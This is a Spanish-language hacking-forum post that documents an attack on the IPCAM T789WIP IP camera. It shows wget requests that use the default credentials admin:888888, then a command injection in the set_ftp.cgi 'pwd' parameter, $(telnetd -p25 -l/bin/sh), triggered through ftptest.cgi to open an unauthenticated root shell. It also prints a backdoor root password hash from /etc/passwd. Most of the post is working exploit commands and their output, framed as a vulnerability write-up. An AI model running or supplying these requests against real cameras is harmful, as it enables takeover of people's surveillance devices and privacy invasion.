#RemoteExecution
Underground => Hacking => Mensaje iniciado por: hielasangre en Mayo 18, 2025, 10:50:45 am
-
Descripción del hardware:
La cámara IP inalámbrica (PnP) IPCAM T789WIP es una cámara web china que permite transmitir de forma remota.
Vendor: http://cd.ipcam.so
Versión de firmware: 48.2.64.220
Versión Dispositivo de interfaz de usuario Web Incrustado: TH2.0.1.27
(https://i.ibb.co/pvMP0Vn4/camara.jpg)
A través de diferentes intentos, lo primero que me ocurrió fue ir buscando diferentes archivos, probando si se podían descargar, ya sea a por medio de una pre autenticación, o sin la misma. Los archivos que intente conseguir son los siguientes:
system.ini
system-b.ini
factory.ini
network.ini
Para esto, utilizamos las credenciales por defecto, usuario: admin y password: 888888
daniel@fuckingmachine % wget -qO- 'http://admin:888888@192.168.1.250:50569/system.ini'|xxd
000006e0: 0004 0404 0404 0100 0005 0000 0000 0000 ................
000006f0: 0100 0000 0000 0000 0000 0000 0000 0000 ................
00000700: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000710: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000720: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000730: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000740: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000750: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000760: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000770: 0000 0000 6164 6d69 6e00 0000 0000 0000 ....admin.......
00000780: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000790: 0000 0000 3838 3838 3838 0000 0000 0000 ....888888......
000007a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000007b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000007c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000007d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000007e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000007f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000800: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000810: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000820: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000830: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000840: 0000 0000 0000 0000 0000 0000 0000 0000 ................
Pero esto no deja nada por ahora, así que tras seguir investigando, pude dar con un RCE (Remote Command Execution) por medio de la configuración FTP.
(https://i.ibb.co/DHB45tRB/ftp-1024x388.png)
La manera de explotarlo será por medio de set_ftp.cgi, configurando los valores utilizando el método GET para esto mismo.
En el primer resquest se setean los valores a aprovechar, y en el segundo se ejecutan, haciendo uso de ftptest.cgi para poner en funcionamiento la configuración seteada anteriormente.
daniel@fuckingmachine % wget -qO- 'http://192.168.1.250:50569/set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=888888&svr=192.168.1.1&port=21&user=ftp&pwd=$(telnetd -p25 -l/bin/sh)&dir=/&mode=PORT&upload_interval=0'
daniel@fuckingmachine % wget -qO- 'http://192.168.1.250:50569/ftptest.cgi?next_url=test_ftp.htm&loginuse=admin&loginpas=888888'
Una vez ejecutado, podemos usar el binario telnetd para iniciar un acceso telnetd sin autenticación de la siguiente manera:
telnet 192.168.1.250 25
Trying 192.168.1.250...
Connected to pc192.168.1.250.
Escape character is '^]'.
BusyBox v1.12.1 (2013-07-23 17:19:11 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
Y así es como podemos empezar a teclear comandos, por ejemplo ver /etc/passwd lo que revela que existe una cuenta de puerta trasera en la cámara: (Backdoor)
# cat /etc/passwd
root:OYZVRABjiXqqQ:0:0:Administrator:/:/bin/sh#
Por tanto se puede dejar en limpio que la cámara posee múltiples vulnerabilidades:
* Credenciales por defecto (admin:888888)
* Usuario de puerta trasera (root:OYZVRABjiXqqQ:0:0:Administrator:/:/bin/sh#)
* RCE sin autenticación a través de la configuración FTP